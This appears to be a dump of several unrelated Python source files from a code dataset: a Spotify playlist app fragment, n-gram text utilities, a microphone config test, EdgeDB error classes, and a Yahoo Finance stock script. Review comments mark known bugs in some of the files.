    # (read by index()/gen_playlist()) untouched.
    tracks.clear()

    # User reached route via POST (as by submitting a form via POST).
    if request.method == "POST":
        # Only proceed when a username was actually submitted; a POST
        # without one falls through to re-render the login form instead
        # of returning None as before.
        if request.form.get("username"):
            session["username"] = request.form.get("username")
            return redirect("/")

    return render_template("login.html")
# Returns a score of how similar two songs are. The lower the score, the lesser the differences.
def compare_score(song, total_features, features):
    """Score how close a song's audio features sit to the aggregate.

    Only float-valued features are compared; each contributes
    value / (total + value) to the sum.  A lower total means the song is
    closer to the group's aggregate profile.
    """
    feature_map = features[0]
    return sum(
        (value / (total_features[key] + value)
         for key, value in feature_map.items()
         if isinstance(value, float)),
        0.0,
    )
# Generates an intelligent playlist.
def gen_playlist(track_ids):
    """Pick the (up to) 20 tracks whose audio features sit closest to the
    group's aggregate feature profile, as scored by compare_score()."""
    client_credentials_manager = SpotifyClientCredentials(client_id, client_secret)
    sp = spotipy.Spotify(client_credentials_manager=client_credentials_manager)
    total_features={"danceability":0.0, "energy":0.0, "key":0.0, "loudness":0.0, "mode":0.0, "speechiness":0.0, "acousticness":0.0, "instrumentalness":0.0, "liveness":0.0, "valence":0.0, "tempo":0.0}
    song_counter=0.0
    # Aggregate the float-valued audio features over all submitted tracks
    # (one API call per track).
    for song in track_ids:
        song_counter += 1
        features = sp.audio_features(tracks=[song])
        for key, value in features[0].items():
            if isinstance(value, float):
                total_features[key] += value
    # Average out the feature totals.
    # NOTE(review): reassigning the loop variable `value` does not write
    # back into the dict, so this loop is a no-op — compare_score() ends
    # up seeing totals rather than averages.
    if song_counter > 0:
        for key, value in total_features.items():
            value /= song_counter
    # Score every track against the aggregate and keep the closest ones.
    song_list=[]
    for song in track_ids:
        score = compare_score(song, total_features, sp.audio_features(tracks=[song]))
        song_list.append((song, score))
    song_list = sorted(song_list, key = lambda x: x[1])
    # Keep the 20 closest (lowest-scoring) songs.
    if len(song_list) > 20:
        song_list = song_list[:20]
    song_list = [song_list[i][0] for i in range(len(song_list))]
    return song_list
|
9,596 | 367c3b4da38623e78f2853f9d3464a414ad049c2 | '''
Utility functions to do get frequencies of n-grams
Author: Jesus I. Ramirez Franco
December 2018
'''
import nltk
import pandas as pd
from nltk.stem.snowball import SnowballStemmer
from pycorenlp import StanfordCoreNLP
import math
from nltk.tokenize import RegexpTokenizer
from nltk.corpus import stopwords
import string
# A Stanford CoreNLP server must be running locally on port 9000 for the
# pos_filter* functions to work.
nlp = StanfordCoreNLP('http://localhost:9000/')
# Part-of-speech tags excluded when filtering (conjunctions, numbers,
# determiners, prepositions, wh-words, punctuation, ...).
pos_not_included = ['CC', 'CD', 'DT', 'FW', 'IN', 'LS', 'PP', 'PP$', 'WP', 'WP$', 'WRB', 'WDT', '#', '$', '“', '``', '(', ')', ',', ':']
# Stricter variant that additionally excludes nouns and proper nouns.
pos_not_included_1 = ['NN', 'NNS','NP', 'NPS','CC', 'CD', 'DT', 'FW', 'IN', 'LS', 'PP', 'PP$', 'WP', 'WP$', 'WRB', 'WDT', '#', '$', '“', '``', '(', ')', ',', ':']
stemmer = SnowballStemmer("english")
#regex_tokenizer = RegexpTokenizer(r'\w+') # Tokenizer that removes punctuation
def clean_doc(text, language='english'):
    '''
    Removes punctuation, changes capital to lower letters and removes
    stop words.

    Inputs:
        text (string): a string to be cleaned
        language (string): stop-word language passed to nltk (default
            'english')
    Returns: a string of the cleaned, space-joined tokens
    '''
    tokens = nltk.word_tokenize(text)
    tokens = [t.lower() for t in tokens]
    # Build the removal set once: the original re-evaluated
    # stopwords.words(language) + list(punctuation) for every single
    # token, making the filter quadratic-ish on long documents.
    to_remove = set(stopwords.words(language)) | set(string.punctuation)
    tokens = [t for t in tokens if t not in to_remove]
    return ' '.join(tokens)
def csv_as_text(file_name):
    '''
    Opens a csv file with sentences and joins the unique sentences from
    column '0' into one string.

    Inputs:
        - file_name (str): name of the file to open
    Returns a string, or None when the file is missing/unreadable or has
    no column named '0' (preserving the original best-effort behaviour).
    '''
    try:
        df = pd.read_csv(file_name)
        # sorted() makes the output deterministic; iterating a bare set
        # joined the sentences in arbitrary order.
        texts_list = sorted(set(df['0']))
        return ' '.join(texts_list)
    except (OSError, KeyError, ValueError, TypeError, pd.errors.ParserError):
        # Narrowed from a bare `except:` so unrelated bugs (e.g. a typo
        # introduced later) are not silently swallowed.
        return None
def gettin_all_text(list_of_files):
    '''
    Opens every csv file in the list and concatenates their sentence
    texts into one corpus string.

    Inputs:
        - list_of_files (list): names of the files to open
    Returns a string
    '''
    texts = (csv_as_text(name) for name in list_of_files)
    readable = [t for t in texts if type(t) == str]
    return ' '.join(readable)
def all_text_list(list_of_files):
    '''
    Opens every csv file in the list and returns the texts that could be
    read (unreadable files yield None and are dropped).

    Inputs:
        - list_of_files (list): names of the files to open
    Returns a list of strings
    '''
    return [t for t in map(csv_as_text, list_of_files) if type(t) == str]
def pos_filter(list_of_texts, filter_list=pos_not_included):
    '''
    Removes the words identified with the Part of Speech included in the
    filter list from every text in the list; the surviving words are
    stemmed before being re-joined.

    Inputs:
        - list_of_texts (list of strings): list with the texts to be analyzed
        - filter_list (list of strings): part-of-speech tags to eliminate
    Returns a list of cleaned texts
    '''
    filtered_texts = []
    for text in list_of_texts:
        # NOTE(review): only ['sentences'][0] is read, so this assumes
        # CoreNLP treats each text as a single sentence — confirm for
        # multi-sentence inputs.
        pos = nlp.annotate(text, properties={'annotators': 'pos', 'outputFormat': 'json'})['sentences'][0]['tokens']
        filtered_words = [stemmer.stem(token['word']) for token in pos if token['pos'] not in filter_list]
        filtered_str = ' '.join(filtered_words)
        filtered_texts.append(filtered_str)
    return filtered_texts
def pos_filter_text(text, filter_list=pos_not_included):
    '''
    Removes the words identified with the Part of Speech included in the
    filter list from a given text.  The text is first split into chunks
    (see make_chunks); each chunk is POS-tagged, filtered and stemmed,
    and the chunks are re-joined at the end.

    Inputs:
        - text (str): text to be analyzed
        - filter_list (list of strings): part-of-speech tags to eliminate
    Returns a cleaned text
    '''
    text_list = make_chunks(text)
    temp = []
    for t in text_list:
        # NOTE(review): only ['sentences'][0] is read per chunk — assumes
        # CoreNLP treats each chunk as one sentence; verify.
        pos = nlp.annotate(t, properties={'annotators': 'pos', 'outputFormat': 'json'})['sentences'][0]['tokens']
        filtered_words = [stemmer.stem(token['word']) for token in pos if token['pos'] not in filter_list]
        filtered_str = ' '.join(filtered_words)
        temp.append(filtered_str)
    final_text = ' '.join(temp)
    return final_text
def pos_filter_corpus(corpus):
    '''
    Applies pos_filter_text to every text in the corpus.

    Inputs:
        - corpus (dict): maps each starting link to the text gathered
          from it.
    Returns a dictionary mapping each link to its cleaned text.
    '''
    return {link: pos_filter_text(text) for link, text in corpus.items()}
def make_chunks(text, max_size=95000):
    '''
    Creates chunks of text with length less than or equal to the defined
    maximum size (the CoreNLP server rejects over-long requests), from an
    original text.

    Inputs:
        - text (str): text to split into chunks
        - max_size (int): maximum chunk length in characters
    Returns a list of chunk strings
    '''
    tokens = nltk.word_tokenize(text)
    chunks = []
    chunk = []
    count = 0
    for word in tokens:
        # Keep adding words while the running size (word plus a joining
        # space) stays under the limit; otherwise flush the current chunk
        # and start a new one seeded with the current word.
        if count < max_size-len(word):
            chunk.append(word)
            count += len(word)+1
        else:
            chunks.append(' '.join(chunk))
            count = len(word)
            chunk = []
            chunk.append(word)
    # Flush the final (possibly partial) chunk.
    chunks.append(' '.join(chunk))
    return chunks
def tokens_freq(corpus, size, top=20):
    '''
    Computes the frequency of n-grams (the window wraps around the end of
    the token list, exactly as the original implementation did) and
    returns the most frequent ones as an ordered data frame.

    Inputs:
        corpus (string): text to be analyzed
        size (int): size of n-grams
        top (int): number of rows to return (default 20, matching the
            previously hard-coded slice)
    Returns: a data frame sorted by descending frequency
    '''
    from collections import Counter

    tokens = nltk.word_tokenize(corpus)
    # Append the first size-1 tokens so every position, including the
    # last ones, yields a full n-gram (circular windows).
    complete = tokens + tokens[:size - 1]
    n_grams = [', '.join(complete[i:i + size]) for i in range(len(tokens))]
    # Counter replaces the manual dict-increment loop; it preserves
    # first-encounter order just like the original dict did.
    frequencies = Counter(n_grams)
    df = pd.DataFrame(frequencies.items(), columns=[str(size) + '-gram', 'Frequency'])
    return df.sort_values(by='Frequency', ascending=False)[:top]
|
9,597 | 164167590051fac3f3fd80c5ed82621ba55c4cc4 | from arnold import config
class TestMicrophone:

    def setup_method(self, method):
        """Load the microphone sensor configuration before each test."""
        self.config = config.SENSOR['microphone']

    def test_config(self):
        """Every required microphone setting must be present."""
        expected_keys = (
            'card_number', 'device_index', 'sample_rate',
            'phrase_time_limit', 'energy_threshold',
        )
        for key in expected_keys:
            assert key in self.config

    def test_listen(self):
        # TODO: Figure out how to mock this
        pass

    def test_recognise_command(self):
        # TODO: Figure out how to mock this
        pass
|
9,598 | b694c834555843cc31617c944fa873f15be2b9c5 | #
# This source file is part of the EdgeDB open source project.
#
# Copyright 2016-present MagicStack Inc. and the EdgeDB authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from . import _base
from ._base import * # NOQA
class InternalError(_base.EdgeDBError):
    """Generic internal server error (code XX000)."""
    code = 'XX000'
class EdgeDBBackendError(InternalError):
    """Internal error originating from the database backend (code XX001)."""
    code = 'XX001'
class IntegrityConstraintViolationError(_base.EdgeDBError):
    """Base class for integrity-constraint violations (code class 23)."""
    code = '23000'
class MissingRequiredPointerError(IntegrityConstraintViolationError):
    """A required pointer was not supplied (code 23502)."""
    code = '23502'

    def __init__(self, msg, *, source_name=None, pointer_name=None):
        """Record the offending source ('s') and pointer ('p') names in
        the error's attribute map alongside the message."""
        super().__init__(msg)
        self._attrs['s'] = source_name
        self._attrs['p'] = pointer_name
class InvalidPointerTargetError(IntegrityConstraintViolationError):
    """A pointer was set to a target of an invalid type (code 23503).

    The previous ``__init__`` merely forwarded ``msg`` to ``super()`` —
    a no-op override — so it has been removed; construction behaviour is
    unchanged.
    """
    code = '23503'
class ConstraintViolationError(IntegrityConstraintViolationError):
    """A schema-declared constraint was violated (code 23514)."""
    code = '23514'
class PointerCardinalityViolationError(IntegrityConstraintViolationError):
    """A pointer's declared cardinality was violated (code 23600)."""
    code = '23600'
class EdgeDBSyntaxError(_base.EdgeDBError):
    """Syntax error in a query or schema definition (code 42600)."""
    code = '42600'
class InvalidTransactionStateError(_base.EdgeDBError):
    """Operation not valid in the current transaction state (code class 25)."""
    code = '25000'
class NoActiveTransactionError(InvalidTransactionStateError):
    """Operation requires an active transaction, but none is open (25P01)."""
    code = '25P01'
|
9,599 | 07854dc9e0a863834b8e671d29d5f407cdd1c13e | import requests
import datetime
from yahoo_finance import Share
def getYahooStock(ticker, date1, date2):
    # Fetch daily history for `ticker` between date1 and date2 (both
    # 'YYYY-MM-DD' strings) and return (ticker, open on the first day,
    # open on the last day).
    # NOTE(review): depends on the long-defunct yahoo_finance API and
    # uses Python 2 print syntax.
    companyData = Share(ticker)
    dataList = companyData.get_historical(date1, date2)
    # The end/start naming implies get_historical returns newest-first
    # — confirm against the library's behaviour.
    endData = dataList[0];
    startData = dataList[len(dataList) - 1];
    print ticker, float(startData['Open']), float(endData['Open'])
    return ticker, float(startData['Open']), float(endData['Open'])
def stockDrop(ticker, date1):
    # Scan from date1 to today for the first opening price lower than the
    # opening price on date1.  Returns (days, original open, lower open);
    # days stays -1 when the price never dropped.
    currentDate = datetime.datetime.now()
    # Build today's date as an unpadded 'Y-M-D' string for the API.
    formattedDate = (str(currentDate.year) + '-' + str(currentDate.month) + '-' + str(currentDate.day))
    companyData = Share(ticker)
    dataList = companyData.get_historical(date1, formattedDate);
    # Last element is treated as the oldest record (the starting open).
    originalStock = float(dataList[len(dataList) - 1]['Open']);
    nextLower = 0
    days = -1
    # Walk oldest-to-newest looking for the first lower open.
    for index, i in enumerate(reversed(dataList)):
        nextLower = i['Open']
        if float(nextLower) < float(originalStock):
            # NOTE(review): len(dataList) - index counts from the end of
            # the range rather than from date1 — confirm this is the
            # intended day count.
            days = len(dataList) - index
            break
    print days, originalStock, nextLower
    return days, originalStock, nextLower
#def stockRange(ticker, date, range):
# dateRange = datetime.datetime()
def buyStock(ticker, buyDate, sellDate, amount):
    # Value at sellDate of `amount` invested in `ticker` at buyDate,
    # using opening prices: amount * (sell open) / (buy open).
    data = getYahooStock(ticker, buyDate, sellDate)
    print (amount * data[2])/data[1]
    return (amount * data[2])/data[1]
# Ad-hoc driver code (Python 2), iterating hour-by-hour over one week.
start_date = datetime.datetime(2017, 4, 7, 0)
end_date = datetime.datetime(2017, 4, 14, 0)
d = start_date
delta = datetime.timedelta(hours=1)
print delta
companyData = Share('UAL')
# NOTE(review): date1/date2 are undefined at module scope — this line
# raises NameError when the script runs.
dataList = companyData.get_historical(date1, date2)
while d <= end_date:
    # NOTE(review): this prints the function object itself; presumably a
    # call with arguments was intended.
    print getYahooStock
    print d.strftime("%Y-%m-%d %H")
    d += delta
stockDrop("BP", '2016-03-29')
getYahooStock("WFC", '2016-03-29', '2017-03-29')
buyStock("WFC", '2016-03-29', '2017-03-29', 1)
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.